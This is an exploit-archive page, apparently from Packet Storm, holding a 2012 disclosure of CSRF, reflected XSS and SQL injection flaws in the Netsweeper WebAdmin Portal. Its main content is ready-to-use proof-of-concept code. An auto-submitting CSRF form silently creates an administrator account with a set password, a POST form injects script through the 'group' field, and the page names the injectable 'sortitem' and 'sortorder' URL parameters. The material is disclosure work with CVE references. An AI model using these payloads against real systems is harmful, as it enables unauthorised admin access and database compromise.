exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Netsweeper WebAdmin Portal CSRF / XSS / SQL Injection

Netsweeper WebAdmin Portal CSRF / XSS / SQL Injection
Posted Sep 17, 2012
Authored by Jacob Holcomb

Netsweeper WebAdmin Portal suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities. Note that most of this data released back in July of 2012 without the SQL injection information.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
advisories | CVE-2012-2446, CVE-2012-2447, CVE-2012-3859
SHA-256 | 334e61b447c540bdcd2f46a9286fba1fb02a185a296fb66758697dd81cba3c6b

Netsweeper WebAdmin Portal CSRF / XSS / SQL Injection

Change Mirror Download
# Exploit Title: Netsweeper WebAdmin Portal CSRF, Reflective XSS, and SQL Injection ("The later")\
# Date: Discovered and reported CSRF and XSS 4/2012 and "The later" 7/2012\
# Author: Jacob Holcomb/Gimppy042\
# Software Link: Netsweeper Inc. - Netsweeper Internet Filter (www.netsweeper.com)\
# CVE :
CVE-2012-2446 for the XSS issues, CVE-2012-2447 for the CSRF, and
CVE-2012-3859 for the SQL Injection ("The later)
NOTE:

# "The later" was disclosed and reported to Netsweeper at a later date and will be posted as an addendum to this post and my posted disclosure report in the near future. "The later" vulnerability bears CVE-2012-3859.

CSRF Exploitation:

In the following example we use CSRF to forge a HTTP POST request that will create an administrator account. The user must be logged in for CSRF to work. Exploitation of a non-administrative users (Sys op) account results in creation of a standard user account.

<head>
<title>CSRF Create Admin - Netsweeper WebAdmin Portal BY:Jacob Holcomb</title>
</head>

<body>

<form name="pwnd" action="http://server.domain_name/webadmin/accountmgr/adminupdate.php?act=add&filter_login=&goodmsg=Account+Added" method="post">
<input type="hidden" name="userid" value="netsweeperPWND" />
<input type="hidden" name="firstname" value="Jacob" />
<input type="hidden" name="lastname" value="Holcomb" />
<input type="hidden" name="email" value="pwnd@pwnd.com" />
<input type="hidden" name="organization" value="yep_PWND" />
<input type="hidden" name="description" value="PWND" />
<input type="hidden" name="pass1" value="Pwnd-321" />
<input type="hidden" name="pass2" value="Pwnd-321" />
<input type="hidden" name="classification" value="admin" />
<input type="hidden" name="expire" value="" />
<input type="hidden" name="accounttheme" value="" />
<input type="hidden" name="accountpmtheme" value="gpmtheme" />

<script>
document.pwnd.submit();
</script>

</body>


XSS Exploitation:

The following POC code exploits a reflective XSS vulnerability using the HTTP POST method.

<head>
<title>Post XSS(Reflective) Netsweeper WebAdmin Portal BY:Jacob Holcomb</title>
</head>

<body>

<form name="pwnd" action="http:// server.domain_name
/webadmin/tools/local_lookup.php?action=lookup" method="post">
<input type="hidden" name="user" value="pwnd" />
<input type="hidden" name="group" value="><script>alert('XSS')</script>" />
<input type="hidden" name="policy" value="pwnd" />
<input type="hidden" name="url" value="pwnd" />

<script>
document.getElementById('pwnd').submit();
</script>

</body>


SQL Injection ("The later") Exploitation:

The Netsweeper Internet Filter WebAdmin Portal is vulnerable to SQL injection, in the sortorder and sortitem variables.

http://SERVER_Hostname/webadmin/reporter/view_details.php?sortitem= SQLi
none &sortorder=asc&type=demand&id=1441
or

http://SERVER_Hostname/webadmin/reporter/view_details.php?sortitem=report_date&sortorder= SQLi
none &type=demand&id=1441.


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close